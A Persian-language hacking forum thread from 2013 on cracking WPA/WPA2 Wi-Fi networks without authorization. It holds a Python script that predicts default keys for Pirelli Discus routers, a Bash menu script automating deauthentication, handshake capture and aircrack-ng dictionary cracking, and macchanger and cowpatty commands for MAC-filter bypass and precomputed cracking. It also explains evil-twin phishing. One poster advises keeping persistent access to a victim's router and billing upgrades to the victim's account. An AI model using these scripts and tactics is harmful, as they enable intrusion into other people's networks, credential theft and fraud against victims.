هک کردن

0x0ptim0us 01-21-2013, 04:48 PM به نام خدایی که در این نزدیکیست ...

بحث جدیدمون در مورد هک شبکه با رمزگذاری WPA/WPA2 هستش ...:7:

همینطور که میدونید ما میتونیم با استفاده از حملات بروت فورس wpa رو بزنیم کاری با این ندارم میخوام یک سناریو طراحی کنم که با روش های معقول نباشه پس به سناریو توجه کنید ...

همینطور که میدونید بهترین روش واسه wpa همین بروت زدن هست
اما فرض کنید شما داخل یک شبکه هستید که هم وایرلس داره و هم adsl تو یک رنج ایپی

فرض کنید شما دسترسی به وایرلس ندارید ولی از طریق کابل به شبکه وصل هستید ولی میخواید کلید وایرلس رو هم به دست بیارید
اینو میشه با روش های معقول به دست آورد اما خیلی زمان بر هست و مثل الگوریتم wep نیست ...

حالا سوال اصلی اینه که با چه روشی میتونید به صورت سریع با ترکیب social engineering یا سایر تکنیک ها کلید رو به دست بیارید ؟
آیا میشه با روش های نوین کاربران رو از شبکه وایرلس انداخت بیرون و بعد به handshake رو capture کرد؟

با چه روشی میتوان handshake به دست اومده را convert کرد و با یکی از ابزار های offline password attack کلید رو به دست آورد ؟

طبق معمول منتظر جواب های خوب و پر بارتون هستم در صورت ناقص بودن تاپیک بعد مدتی تکمیل خواهد شد ...

موفق باشید.


Xakep 01-21-2013, 05:05 PM هر کی راهی داره به این سناریو ها برای کلا wifi هکینگ بگه البته working باشه و این که نرم افزار هایی با متود های مشابه رو مثال نزنید .
Hacking WEP Encryption
scenario’s {
scenario 1 : WEP encryption, OPEN Authentication, MAC filtering enabled, active client on network
scenario 2 :WEP encryption, OPEN Authentication, MAC filtering enabled (?), no active clients
scenario 3:WEP encryption, Shared Key Authentication instead of OPEN
}
Cracking WPA2 PSK with Backtrack 4, aircrack-ng and John The Ripper
performing the crack
airolib-ng
Xakep 01-21-2013, 08:31 PM # Default WPA2-PSK algorithm vulnerability

#!/usr/bin/python
#
# Pirelli Discus DRG A225 WiFi router
# Default WPA2-PSK algorithm vulnerability
#
# With this code we can predict the WPA2-PSK key...
#
# Hacked up by Muris Kurgas aka j0rgan
#
j0rgan (-@-) remote-exploit.org
#
http://www.remote-exploit.org
#
# Use for education or legal penetration testing purposes.....
#
import sys
def hex2dec(s):
return int(s, 16)
if len(sys.argv) < 2 or len(sys.argv[1]) != 6:
print "\r\nEnter the last 6 chars from Discus SSID"
print "i.e. SSID should be 'Discus--XXXXXX', where XXXXXX is last 6 chars\r\n"
exit()
const = hex2dec('D0EC31')
inp = hex2dec(sys.argv[1])
result = (inp - const)/4
print "Possible PSK for Discus--"+sys.argv[1]+" would be: YW0"+str(result)
Xakep 01-21-2013, 08:33 PM #!/bin/bash

# airoWPA-PSK.sh v0.1
# written by ka0x

if [ $UID != 0 ]; then
echo "[!] NECESITAS EJECUTAR EL SCRIPT $0 CON PRIVILEJIOS DE SUPERUSUARIO"
exit
fi

comprueba_mac(){
if [ ! "${#1}" -eq "17" ]; then
echo -e "\033[31mMac Incorrecta\n\033[0m"
exit
fi
}
interfaces() {
echo -e "\n\033[31m Seleccione la interfaz que va a utilizar: \033[0m\n"
INTERFACES=$(iwconfig | grep ESSID | awk '{ print $1 }')
select INTER in $INTERFACES; do
break;
done
clear
}

monitor(){
airmon-ng start $INTER
clear
menu
}

handshake(){
clear
read -p "[-] Introduzca la MAC del AP: " mac_ap
comprueba_mac $mac_ap
read -p "[-] Introduzca la MAC del Cliente: " mac_client
comprueba_mac $mac_client
read -p "[-] Introduzca el canal del AP: " mac_chanel
read -p "[-] Nombre de archivo donde se guardaran los datos capturados: " datas
xterm -hold -title "Obteniendo Handshake en $mac_ap" -geometry 96x60+0+0 -bg "#000000" -fg "#FFFFFF" -e airodump-ng --bssid $mac_ap -c $mac_chanel -w $datas $INTER && clear && menu
}

desautenticacion(){
clear
read -p "[-] Introduzca la MAC del AP: " mac_ap
comprueba_mac $mac_ap
read -p "[-] Introduzca la MAC del cliente asociado: " mac_cliente
comprueba_mac $mac_cliente
read -p "[-] Introduzca el numero de desautenticaciones: " num
xterm -hold -geometry 70x25-0+0 -bg "#000000" -fg "#99CCFF" -title "Desautenticando $mac_cliente del AP $mac_ap $num veces" -e aireplay-ng -0 $num -a $mac_ap -c $mac_cliente $INTER
clear
menu
}

crack_dicc(){
clear
read -p "[-] Introduzca la ruta del diccionario: " diccionario
echo "[-] Seleccione el archivo de datos capturados:"

LS_DIR=$(ls *.cap)
select DATA in $LS_DIR; do
break;
done

xterm -hold -geometry 70x25-0+0 -bg "#000000" -fg "#99CCFF" -title "Obteniendo clave con diccionario: $diccionario" -hold -e aircrack-ng -w $diccionario $DATA
menu
}

menu(){
echo -e "\n Opciones:\n"
echo -e "\033[31m-=-=-=-=-=-=-=-=-=-=-=-=-\033[0m"
echo "1 - Activar Modo Monitor"
echo "2 - Capturar handshake"
echo "3 - Desautenticar cliente"
echo "4 - Obtener clave con diccionario"
echo "5 - Salir"
echo -e "\033[31m-=-=-=-=-=-=-=-=-=-=-=-=-\n\033[0m"

read -p "opcion> " OPCION

case $OPCION in
"1") monitor;;
"2") handshake;;
"3") desautenticacion;;
"4") crack_dicc;;
"5") exit;;
*) echo -e "\033[31m[!] OPCION NO VALIDA\n\033[0m" && menu;;

esac
}

interfaces
menu

# __EOF
E2MA3N 01-22-2013, 02:29 PM سلام دوستان

داشتم می چرخیدم یک فیلم جدید پیدا کردم در مورد WPA2 که خود فیلم ذکر کرده : No Bruteforcing !
(( متاسفانه خودم هنوز ندیدم ))
دانلود :

fs2.filegir.com/e2ma3n/Hacking_WPA_2_Key_%26ndash__Evil_Twin_%2 8No_Bruteforce%29.flv

فرض کنید شما دسترسی به وایرلس ندارید ولی از طریق کابل به شبکه وصل هستید ولی میخواید کلید وایرلس رو هم به دست بیارید
اینو میشه با روش های معقول به دست آورد اما خیلی زمان بر هست و مثل الگوریتم wep نیست ...

اگه اشتباه نکنم برای مثال خط های رانژه شده ی ADSL که کاربر از مودم های وایرلس استفاده می کنه یعنی مودم هم امواج می فرسته هم می شه با کابل وصل شد ....

اگه همون طور که دوستمون گفتند به صورت کابل متصل باشیم می تونیم از طریق مرورگر وارد 192.168.1.1 بشیم و از اون جا پسورد رو برداریم

اگر پسورد و یا حتی یوزر از حالت پیش فرض مثلا ادمین ادمین خارج شده بود با ابزار هایی مثال hydra و یا حتی متااسپلویت می تونید پسورد رو بدست بیارید و با توجه به این که داخل یک شبکه محلی هستید این کار زمان زیادی شاید نبره !

در آخر اگه وارد صفحه ی کانفیگ مودم شدید می تونید پسورد رو از قسمت های مربوطه (مثلا در مودم Dlink قسمت Manual Wireless Network Setup مشاهده کنید)

اگر هم این پسورد به صورت ستاره دار بود می تونید به این صورت پسورد رو بدست بیارید :

چون پسورد ذخیره شده می تونید با استفاده از inspect element فایرفکس و تغییر type از پسورد به text پسورد رو مشاهده کنید

اگه جایی اشکال داشت به بزرگی خودتون ببخشید ... :14:
Turk Server 01-22-2013, 03:16 PM تو ویندوز تنظیمات مربوط به پسورد wpa2psk به این صورت ذخیره میشه

<?xml version="1.0"?>

HOSTED_NETWORK_PROFILE


424C41434B4841542D3433323530
BLACKHAT-43250




100



WPA2PSK
AES


passPhrase
true
01000000D08C9DDF0115D1118C7A00C04FC297EB 01000000CE9FEAEE7DB3384A82CF2E24953F8CF9 0000000002000000000010660000000100002000 000022E19C330BE92742D064E157B01B1718B433 9F591A6388A523285C9BAC4129F6000000000E80 00000002000020000000619DDE018818C3FB92D7 8A4CB9145305CA511C2103A304F20957EBE22896 96345000000037CF44B9D5D0A2D726B0B90759F8 66A4B1E35C568A582A755C19DB2DFAEA08BF42BD 1B7828112F470579EAFDBFD24D2CF6D44345D46A 6B3EC46B7E958873A0D858A0F54640D76BB46D8A 2942C6DDFCC4400000005A27F322BB3324EAEA4A FF480FAA3C6E570DE5EDD1D6CB231E456FA91293 D10AACE923F38B719278F5F8273CB738C512CFCE FD221D0488D9FB59EEFC9A03531D






که ظاهرا الگوریتمش بدون بازگشت نیست
0x0ptim0us 01-22-2013, 04:26 PM فیلمی که دوستمون آقای E2MA3N گذاشتن جواب یکی از سوالات من بود

یک توضیح کوتاه در مورد این روش :

این روش به نام evil twin معروف هست که در اون نفوذگر ابتدا یک صفحه قلابی از قسمت پسورد وایرلس میسازه و با شیوه S.E پسورد رو از کاربر میگیره ...
ایمان جان شما هم اگر وقت کردید یک مقاله کوتاه در مورد این روش همینجا ارائه بدید چون قانون تاپیک به این شکل هست که باید روش ها یکی یکی توضیح داده بشه و این روش بهترین راه یادگیری هست ...

پیوست : این روش در مواقع به خصوص و در شرایط خاصی قابل پیاده سازی میباشد.
Benevolent 01-22-2013, 07:41 PM آیا میشه با روش های نوین کاربران رو از شبکه وایرلس انداخت بیرون و بعد به handshake رو capture کرد؟
aireplay-ng به همراه سوئیچ deauth-- و MAC Address کاربر قربانی، کاربر رو از شبکه WiFi میاندازه بیرون. با Deauthenticate شدن کاربر، سیستمش سعی میکنه مجددا Authenticate کنه؛ پس یک airmon-ng هم اجرا می کنید تا ترافیک شبکه رو کپچر کنه. به این ترتیب با Authenticate مجدد کاربر، فرآیند handshake اش کپچر میشه.

با چه روشی میتوان handshake به دست اومده را convert کرد و با یکی از ابزار های offline password attack کلید رو به دست آورد ؟
برای زدن WPA/WPA2 فقط باید handshake در دسترس باشه، و مثل WEP نمیشه روی جمع کردن IV حساب کرد. در صورتی که handshake در مرحله قبلی کپچر شده باشه، اون وقت میشه با aircrack-ng یا ابزارهای دیگه برای زدن پسورد تلاش کرد. WPA نقص رمزنگاری شناخته شده نداره، پس از نظر فنی تنها راه رسیدن به پسوردش سعی و خطا است، که میتونه به صورت Dictionary Attack یا Brute Force انجام بشه. اگر کارت گرافیک درست و حسابی داشته باشید، می تونید از GPU Computing برای افزایش سرعت استفاده کنید. در صورت استفاده از GPU میشه از ابزارهایی مثل oclhashcat هم استفاده کرد که برای استفاده از توان GPU و پردازش موازی بهینه سازی شدند. البته oclhashcat با فایل های کپچر شده airmon-ng کار نمیکنه بلکه باید با استفاده از ابزارهای cap2hccap فایل رو تبدیل به hccap کرد، و بعدش اون رو برای کرک پسورد به oclhashcat داد. البته اگر کاربر از Radius Server برای Authenticate استفاده کنه، و یا Shared Key خفنی انتخاب کنه، عملا راه حل شناخته شده ای برای زدن مستقیم WPA نیست. مگر اینکه روی حماقت انسانی کاربران حساب باز کنه، که اون از مقوله فنی خارج میشه.

اگر خیلی مایه دار باشید، می تونید چندتا GPU Server با 8 یا 10 کارت NVIDIA Tesla بخرید و با هم کلاستر کنید، و با تکنیک های MPI و یا استفاده از برخی کتابخونه های آماده مثل VCL، یک توان پردازشی خفن ایجاد کنید. با داشتن همچین توانی و فراهم کردن چندتا دیکشنری و Rainbow table درست و حسابی می تونید خیلی از پسوردهای WPA و البته خیلی چیزهای دیگه رو بزنید. البته همچین چیزی دور و بر یک میلیارد تومن براتون آب میخوره ;-)
helobedin 01-23-2013, 11:16 AM سلام اساتید ،

ببخشید من می تونم از مودم وای فای برای هک استفاده کنم ؟ اگر آره چه جوری ؟
Benevolent 01-23-2013, 09:48 PM ببخشید من می تونم از مودم وای فای برای هک استفاده کنم ؟
برای هک WiFi به کارت شبکه بی سیمی نیاز دارید که بتونه به مد مانیتورینگ (Promiscuous mode) سوئیچ کنه. به طور عادی درایورهای کارت های شبکه بی سیم این قابلیت رو فعال نمی کنند. پس یا باید کارت شبکه بی سیم شما درایور اوپن سورسی جایی داشته باشه که بتونید با نصب اون درایور کارت رو به حالت مانیتورینگ ببرید، یا یکی به نوعی نسخه دستکاری شده ای از درایور کارت شما رو داشته باشه که این قابلیت توش فعال شده باشه. این برای حالتی هست که بخواید از کارت شبکه موجود در لپ تاپ یا تبلت تون استفاده کنید.
حالت دیگه اینه که اصلا کارت شبکه ای بخرید که برای این کار ساخته شده، مثل کارت های Alpha و یا AirPCAP. البته این کارت ها رسما به عنوان کارت شبکه مخصوص هک فروخته نمیشند، ولی در درایورهاشون مد مانیتورینگ به طور پیش فرض فعال هست. قدرت ارسال سیگنال و قدرت بازیابی پکت های معیوب بالایی دارند. بر اساس تجربیات شخصی باید بگم که کارت های Alpha قدرت بیشتری نسبت به AirPCAP و کارت های مشابه دیگه دارند. به راحتی هم می تونید آنتن های مختلفی بهشون وصل کنید تا قدرت جمع آوری سیگنال تون افزایش پیدا کنه. چند سال پیش قیمت یک کارت آلفا با توان یک آمپر حدود 100 یا 120 تومن بود. الان قیمت ندارم.
ronin 01-24-2013, 07:10 AM بر اساس تجربیات شخصی باید بگم که کارت های Alpha قدرت بیشتری نسبت به AirPCAP و کارت های مشابه دیگه دارند. به راحتی هم می تونید آنتن های مختلفی بهشون وصل کنید تا قدرت جمع آوری سیگنال تون افزایش پیدا کنه. چند سال پیش قیمت یک کارت آلفا با توان یک آمپر حدود 100 یا 120 تومن بود. الان قیمت ندارم
اون چیزی که در ایران به اسم آلفا (Alfa !) مرسوم هست و بیشترین سازگاری با نرم افزار هایی مثل aircrack رو داره، مدل AWUS036H هست که تو بازار ایران هم پیدا میشه (قبل از گرونی دلار با 30-40 تومن هم پیدا می شد)
آلفا قبلا نسخه 0.5 واتی هم داشت منتها من هر چه در بازار و دست دوستان دیدم 1 واتی بودن و مدل های با توان آر اف بالاتر (2 وات) هم داره؛
مزیت بزرگ آلفا یکی در توان بالای اون و دیگری در کانکتور SMA اون هست که اجازه میده با سوکت های استاندارد انواع انتن رو بهش وصل کنید.
AirPCAP در مدل های ارزونش (که ارزون ترینش حدود 199 دلاره!) قابلیت اتصال آنتن اکسترنال نداره و توان آر افش کمتر هست (البته روی اعداد نباید حساسیت بیش از حد داشت؛ این توان واقعا زیاده و بیش از نیاز یک کاربر معمولی)
مدل های گرون تر AirPCAP و Alfa از 802.11n پشتیبانی می کنند.
(AirPCAP NX از MIMO و قابلیت اتصال دو آنتن پشتیبانی می کنه و آنتن اکسترنال هم می خوره بهش)
MR.AN0NYM 02-15-2013, 01:36 AM فرض کنید شما دسترسی به وایرلس ندارید ولی از طریق کابل به شبکه وصل هستید ولی میخواید کلید وایرلس رو هم به دست بیارید.

با سلام
وقتی شما میگید که با استفاده از کابل به اون شبکه وصل هستید و می خواهید کلید وایرلس همون شبکه رو بدست بیارید مثل اینه که شما با کابل به یه مودم adsl که وایرلس AP هم داره متصلید و می خواهید کلید وایرلس اون رو هم بدست بیارید تا از محدودیت جابجایی و تک کاربری خلاص بشید (بعضا در هتل ها یا سمینارها اینطوریه) . خوب شما یه آی پی از رنج اون شبکه گرفتید و آی پی روتیبل اینترنتی اون رو هم دارید.
معمولا اولین یا اخرین ای پی از رنج تو مودمها برای DNS و Gateway ست میشه که اگه dhcp فعال باشه اصولا اولین ای پی رو میگیره پس شما با رفتن به صفحه کانفیگ مودم به آدرس مثلا : 192.168.1.1 و وارد کردن یوزر و پسورد اولیه میتونید کلید تعریف شده برای دسترسی وایرلس رو ببینید.
خوب این خوش بینانه ترین حالتیه که شما ممکنه باهاش روبرو بشید. یوزر و پس اولیه اگه تغییر داده شده و شما نمی تونید وارد بشید باز باید مطمئن باشید که یوزر همون یوزر اولیه هست چون توی مودم ها شما اجازه تغییر یوزر رو ندارید(که با توجه به برند و نوع مودم مورد استفاده از طریق defalut password که از اینترنت می تونید پیداش کنید به یوزر اولیه و ثابت اون دست پیدا کنید، مثلا admin / Adminیا مدل مودم استفاده میشه اکثرا)، می مونه فقط پسورد که چون اینجا ایران هست و سطح امنیتی بالا مطمئنا بیشتر از چند ساعت معطل نخواهید شد.
مزیت این روش اینه که شما خودتون رو درگیر اکسس پوینت نمی کنید و رمزنگاری وایرلس هرچی باشه شما پسورد رو از صفحه کانفیگ مودم فقط کپی و پیست می کنید و حتی اگه روزی چند با کلید وایرلس عوض بشه شما خیالتوم راحته که هیچ مشکلی نخواهید داشت برای گرفتن کلید جدید.
MR.AN0NYM 02-15-2013, 01:54 AM خوب شما یوزر و پس صفحه کانفیگ مودم رو بدست اوردید و ای پی بیرونی این شبکه رو که به اینترنت وصلتون میکنه رو هم دارید.
خوب فرض کنید اینترنت از مخابرات یا وایمکس ایرانسل بوده... شما با وارد کردن ای پی روتیبلتون در یه شبکه دیگه به همون صفحه کانفیگ مودم متصل خواهید شد. اگه پرووایدر ای پی ها رو فقط از رنج خودش قبول کنه شما برای اینکه به صفحه کانفیگ اون مودم که هدف هست برسید باید از همون پرووایدر ای پی گرفته باشید یعنی اگه پرووایدر هدف مخابرات یا ایرانسل هست شما هم باید از مخابرات یا ایرانسل ای پی گرفته باشید تا بتونید صفحه کانفیگ مودم هدف رو ببینید.
این چنین کاری برای وقتی لازمه که شما ممکنه چند ساعت بیشتر توسط کابل به اون شبکه دسترسی نداشته باشید و لازمه بعدا از همون اینترنت استفاده کنید.
خوب تو اون چند ساعت سعی کنید پسورد مودم رو پیدا کنید.
اگه به این فکر می کنید که با پیدا کردن پسورد مودم و برداشتن کلید وایرلس کارتون تموم شده اشتباه نکنید
تازه اول راهه
شما باید بتونید این دسترسی رو نگه دارید برای یه مدت طولانی
ای پی بیرونی رو که حتما برداشتید . برای چی نداره که!! تا اگه کلید وایرلس عوض شد از طریق اون ای پی حتی بیرون از اون شبکه با وارد شدن به صفحه کانفیگ مودم کلید وایرلس رو بدست اورد.
MR.AN0NYM 02-15-2013, 02:12 AM توجه : یادتون باشه حتما چک کنید ای پی گرفته شده از پرووایدر داینامیک هست یا استاتیک. اگه دینامیک باشه تو هر بار روشن و خاموش شدن مودم یه ای پی جدید میگیره. سعی کنید در اولین ورود به صفحه کانفیگ مودم مشخصات ای پی رو کامل بردارید و در بخش ست ای پی همون مشخصات رو به صورت استاتیک وارد کنید تا وقتی مودم خاموش یا روشن شد همون ای پی رو داشته باشه.
اگه این روش جواب نمیده یوزر و پس اکانت کاربریشو بردارید و با رفتن به سایت ارائه دهنده خدماتش ای پی استاتیک سفارش بدید هموم لحظه حتی اگه شده هزینشو از جیبتون بدید تا همیشه او شبکهتو دستتون باشه بستگی به شرایز خودتون داره. بعضا مشاهده شده ملت رفتن و سفارش افزایش پهنای باند و ای پی استاتیک دادن و قربانی بدبخت رو قبض تلفنش پرداخت کرده:11:
برای اون دوستانی که میگن اگه نشه پسورد مودم رو بدست اورد باید چکار کرد می تونم بگم با حمله به اکسس پوینت و خوابوندن وایرلس ادمین شبکه رو مجبور می کنید مودم رو رست کنه.
خوب اینجوری یوزر و پس مودم میره به حالت پیش فرض.
شما باید از این فرصت نهایت استفاده رو ببرید و با یک حرکت پلنگی منتظر باشید ادمین کلیه تنظیمات خودشو اوکی کنه و ببینه که وایرلسش با کلیدی که اونجا تعریف کرده در دسترس هست بعدا بیاد و اگه کمی امنیت سرش میشه پس مودم رو عوض کنه.

حلت های مختلف این روش را برای ایجاد و حفظ دسترسی به شبکه ، مودم و وایرلس در نظر بگیرید ؛ مطمئنا از بهترین روش هاست
موفق باشید:14:
0x0ptim0us 02-15-2013, 09:13 AM حالا از کجا معلوم که یوزر پسورد اولیه تغییر کرده باشه؟
این روش همیشه جواب نمیده بحث ما در شرایط سخت مطرح شده ...
MR.AN0NYM 02-15-2013, 07:04 PM داشتم ارشیو کتابها رو نگاه می کردم به offensive security - wifu برخوردم که تو صفحات اخرش در مورد wpa/wpa2 بحث کرده و هندشیک جمع آوری شده رو هم با john the ripper کرک میکنه.
البته گفته که فقط در مورد psk جواب میده پس اگه psk نبود این روش جواب نمی ده و فقط مختص pre-sharekey می باشد

همه اموزش های wifu مبتنی بر aircrack-ng هست که حتما باید نحوه کار با اون رو بلد باشید
راه حل ساده و راحتتر در کار با اون دستورات استفاده از fern هست که خودش مجموعه دستورات لازم برای به دست اوردن پسورد رو با تشخیص نوع انکریپشن wep/ wpa خودش انجام میده و اخر کار به شما پسورد رو تحویل میده.
E2MA3N 02-19-2013, 11:12 PM فیلمی که دوستمون آقای E2MA3N گذاشتن جواب یکی از سوالات من بود

یک توضیح کوتاه در مورد این روش :

این روش به نام evil twin معروف هست که در اون نفوذگر ابتدا یک صفحه قلابی از قسمت پسورد وایرلس میسازه و با شیوه S.E پسورد رو از کاربر میگیره ...
ایمان جان شما هم اگر وقت کردید یک مقاله کوتاه در مورد این روش همینجا ارائه بدید چون قانون تاپیک به این شکل هست که باید روش ها یکی یکی توضیح داده بشه و این روش بهترین راه یادگیری هست ...

همون طور که فردین عزیز توضیح دادند محور اصلی کار روی مهندسی اجتماعی و در واقع گول خوردن قربانی و یک صفحه ی تقلبی مبنی بر دریافت کلمه ی عبور می باشد

فیلم واقعا توضیحاتش خوبه و قابل فهم اما اگر بخوام یکم عامیانه تر توضیح بدم این جور می شه :

ابتدا یک اسکن کلی انجام می دیم و یک تارگت رو انتخاب می کنیم
در اکثر مواقع تارگت essid پنهان نمی باشد (اگر به صورت پینهان باشه با استفاده از روش هایی که هست می شه پیدا کرد)
خب حالا ما میایم با همون اسم (essid قربانی) یک وایرلس ایجاد می کنیم (طریقه ی انجام در فیلم گفته شده)
حالا ترتیبی می دیم که هرکی به وصل شد به صفحه ی تلقبی ما هدایت شود (طریقه ی انجام در فیلم گفته شده | با استفاده از آپاچی و iptables)
در آخر دسترسی قربانی رو از وایرلسی که بهش وصل هست قطع می کنیم (طریقه ی انجام در فیلم گفته شده | با استفاده از aireplay)

خب حالا S.E اینجاست که قربانی می خواد دوباره وصل بشه به نت به اونی وصل بشه که ما ساختیم
وقتی که وصل شد هر صفحه ای رو که قرار باشه با مرورگرش باز کنه اون صفحه ی تقلبی ما براش به نمایش در میاد که اون صفحه قربانی رو مجبور می کنه که پسورد وایرلس رو وارد کنه


پیوست : این روش در مواقع به خصوص و در شرایط خاصی قابل پیاده سازی میباشد.
اگر اشتباه نکنم برای این قابل پیاده سازی نیست که :
1. قربانی یک بار دیسی می شه و شک می کنه و مهم تر از اون با وقتی که می خواد دوباره وصل بشه با دو شبکه ی وایرلس هم نام مواجه می شه که باز هم شک می کنه

2. معمولی قربانی به مودم نزدیک هست و ما از اون دور ! برای همین اولیت در برقراری ارتباط با مودم میوفته (اگه اشتباه نکنم)

3. اگر قربانی یکم تیز باشه و بیاد یک اسکن کنه با هم چین bssid ای مواجه می شه : 00:12:23:34:45:56 که شکش رو به یقین تبدیل می کنه

دوستان اگر موردی موند تکمیل کنید :14: ضمن این که فردین جان بحثو جمع کن که منتظریم :2:


در آخر این فیلم رو پیشنهاد می کنم حتما ببینید :



www.youtube.com/watch?v=2upq7Ks3tBY
0x0ptim0us 02-20-2013, 09:40 AM سلام
همینطور که آقا ایمان توضیح دادند ما میتونیم از این قابلیت استفاده کنیم
اما ایمان جان نمیدونم تا حالا تونستی mac filltering رو بایپس کنی یا نه اما زمانی که میخوای این کارو بکنی یک mac آدرس قلابی استفاده میکنی حالا که بحثش باز شد اجازه بدین این رو هم توضیح بدم و این بحث رو تموم کنیم یعنی همین بحث evli twin
خوب ایمان جان اینجا گفتن :

3. اگر قربانی یکم تیز باشه و بیاد یک اسکن کنه با هم چین bssid ای مواجه می شه : 00:23:34:45:56 که شکش رو به یقین تبدیل می کنه
خوب اینو ما میتونیم تغییر بدیم ...
حالا با یه مثال شروع میکنم

شما فرض کنید یک شبکه وایرلس داریم که 2 نفر با mac های مشخص که به روتر تعریف کردند میتونند وارد شبکه بشن
حالا اگه ما هم پسورد رو داشته باشیم بازم نمیتونیم کانکت بشم چرا ؟ چون فقط 2 تا mac تعریف شده که میتونند کانکت بشن
برای این کار ما اول باید شبکه رو down کنیم فرض کنید اسم کارت شبکه وایرلس wlan0 هست با دستور :

ifconfig wlan0 down
اینو میتونید به این شکل هم وارد کنید :
ifdown wlan0
خوب حالا باید با ابزار macchanger تغییر بدیم اما قبلش ما نیاز به یک مک آدرس داریم که واسه روتر تعریف شده باشه
واسه همین کار باید اول کارت شبکه رو به حالت مونیتورینگ در بیاریم (یادتون باشه دوباره شبکه رو up کنید اون بالایی مثال بود) :
airmon-ng start wlan0
حال کارت شبکه مجازی mon0 برای ما بوجود امد، اینم بگم یه تکنیک ساده واسه اسکن کردن شبکه این که میتونید با دستور زیر شبکه رو اسکن کنید :
iwlist wlan0 scaning
البته این اطلاعات اضافی رو هم میده اما اگه شما نیاز به ssid دارید میتونید grep کنیدش :
iwlist wlan0 scaning | grep "essid"
خوب بگذریم حالا باید شروع کنیم به capture که از داخل اون بتونیم mac مربوط به کلاینت هایی کا به شبکه وصلن رو پیدا کنیم و یه نمونه تقلبی ازش بسازیم (من زیاد توضیح نمیدم دیگه چون خودتون واردین) فرض کنید channel مربوط به شبکه وایرلس مثلا 9 هستش bssid رو هم 22:22:22:22:22 فرض کنید:
airodump-ng -c 9 -a --bssid 22:22:22:22:22 mon0

حالا میتونید مک آدرس هایی که وصل هستند رو ببینید
حالا mac رو کپی کنید و کارت شبکه wlan0 رو down کنید و با macchanger عوض کنید بدین شکل (فرض کنید مک قربانی که وصل شده این هست 55:55:55:55:55 )
خوب جالا باید مک خودمون که مثلا xx:xx:xx:xx:xx هست رو به 55:55:55:55:55 تغیر بدیم که بتونیم کانکت بشیم پس اول down میکنیم :
ifconfig down wlan0
بعد عوض میکنیم :
macchanger -m 55:55:55:55:55 wlan0
تا اینجای کار همه چی خوب پیش رفته :
حالا دوباره wlan0 رو up کنید :
ifconfig wlan0 up
حالا میتونید به شبکه قربانی وصل بشید ... به این تکنیک اصولا bypass mac filltering گفته میشه
این بحث هم به خوبی جمع و جور شد و دستانی که با روش evil twin آشنا نبودند آشنا شدند
امیدوارم همه بحث ها به این شکا ادامه پیدا کنه
با تشکر از داداش گام میکائیل
با حق
E2MA3N 02-20-2013, 11:05 AM با تشکر از فردین عزیز

حالا که بحث مک فیلترینگ شد این رو هم بگم که به چنیدن شبکه وایرلس که از این قابلیت استفاده می کنن برخورد کردم و با تغییر مک سیستم به یکی از کلاینت ها تونستم به شبکه وصل بشم اما در چندین مورد هم خیر ! یعنی با این که مک آدرس خودم رو به یکی از کلاینت ها تغییر دادم (حتی زمانی سعی کردم وصل بشم که اون کلاینت آفلاین هست) اما نتونستم به شبکه وصل بشم ! نمی دونم این همون اشکلاتی هست که برای وصل شدن به اینترنت توی بک ترک مطرح شده یا این که اون شبکه ها از قابلیت دیگه ای استفاده می کنن :4:

ضمنا دوستانی که کلا به هر طریقی تونستند به یک شبکه ی وایرلس متصل بشند حواسشون به Host name سیستمشون باشه :2: توی بک ترک که به صورت پیش فرض bt است اما اگه از توزیع های دیگه ی لینوکس یا به خصوص از ویندوز استفاده می کنید حتما این مورد رو رعایت کنید


جا داره حالا که چلش در مورد "تکنیک های هک شبکه های وایرلس با اینکریپشن wpa/wpa2" هست فقط اکتفا به evli twin نکنیم برای همین چند مورد رو خودم استارت می زنم
توی کرک کردن پسورد شبکه های وایرلس می شه به صورت استاندارد از aircrack و یا حتی از hashcat استفاده کرد که با توجه به سیستممون سرعتش این ابزار ها متغییر هست

اما روش هایی هست که با استفاده از genpmk و یا airolib-ng به ما این اجازه رو می دند که با سرعتی باور نکردنی کرک کنیم اگه اشتباه نکنم اصول کار این روش این طوره که با استفاده از دو برنامه ی بالا ابتدا میایم از پپسورد لیستمون یک نسخه ی هش شده تبدیل می کنیم (که این نسخه ی هش شده وابسطه به essid قربانی می باشد) و وقتی نسخه ی هش پسورد لیستمون تهیه شد با سرعت باور نکردی ! (در حدود5 ثانیه) اقدام به کرک می کنیم

genpmk -s [essid] -d [hash file name] -f [word list]

cowpatty -s [essid] -r [name].cap -d [hash file]

برای airolib-ng از فیلم زیر استفاده کنید

http://www.securitytube.net/video/6891

اما همون طور که در بالا گفتم این روش ها فقط برای یک essid می باشد یعنی این گونه نیست که شما 1 بار وقت بزارید و یک پسورد لیست هش شده تهیه کنید و به صورت مداوم از اون استفاده کنید

حالا سوال من اینه که می شه essid رو درون این فایل هش تغییر داد ؟؟ مثلا با hexedit ؟؟ تا بشه سرعت کرک کردن رو افزایش داد

ممون از دوستانی که توی بحث شرکت می کنن :14:
0x0ptim0us 02-20-2013, 11:20 AM حالا سوال من اینه که می شه essid رو درون این فایل هش تغییر داد ؟؟ مثلا با hexedit ؟؟ تا بشه سرعت کرک کردن رو افزایش داد

نه نمیشه ! شما تو این نوع حمله نیاز دارید با استفاده از تکنیک deauthenticaion قربانی رو بندازید بیرون و هنگام کانکت قربانی به وایرلس handshake رو بزنید و این فقط تو اون essid صادق هست.
(^_^) 03-06-2013, 10:25 PM سلام وای بحث این تاپیک چقدر شیرین شد من متاسفانه دنبالش نکرده بودم
خب دوستان من یه مدت روی این کار میکردم که اآیا میشه قربانی بدون کلیک کردن روی fake accesspoint به اون متصل بشه؟
من یه کم دقت کردم و یک چیز ساده رو متوجه شدم:
فرض کنید یک AP رو انتخاب میکنیم و مشخصآت اون یعنی پسورد رو وارد میکنیم و بهش متصل میشیم ، زمانی که مجددا میخوایم به اون متصل بشیم سیستم ما به طور اوتوماتیک این کار رو برای ما انجام میده ، من به خودم گفتم که سیستم من از کجا این اکسس پوینت رو تشخیص میده و بهش متصل میشه؟!!
یه تست کوچیک ساده انجام دادم و متوجه شدم که جواب ساده تر از این حرفاست ، سیستم تنها و تنها با استفاده از essid تشخیص میده که باید به اکسس پوینت متصل بشه یا نه!!! در حالی که من خودم فکر میکردم حد اقل باید مک AP ثبت بشه و از روی اون عمل شناسایی انجام بشه ، وقتی که یه اکسس پوینت با یکی از نام های ذخیره شده در سیستمم ساختم ( اکسس پوینتی که در دانشگاه ازش استفاده میکردم) دیدم به طور اوتوماتیک به اون متصل شد!!! در صورتی که اگر از روی mac AP شناسایی انجام میگرفت نباید این اتفاق میافتاد چون من هیچ مکی رو تعغیر ندادم
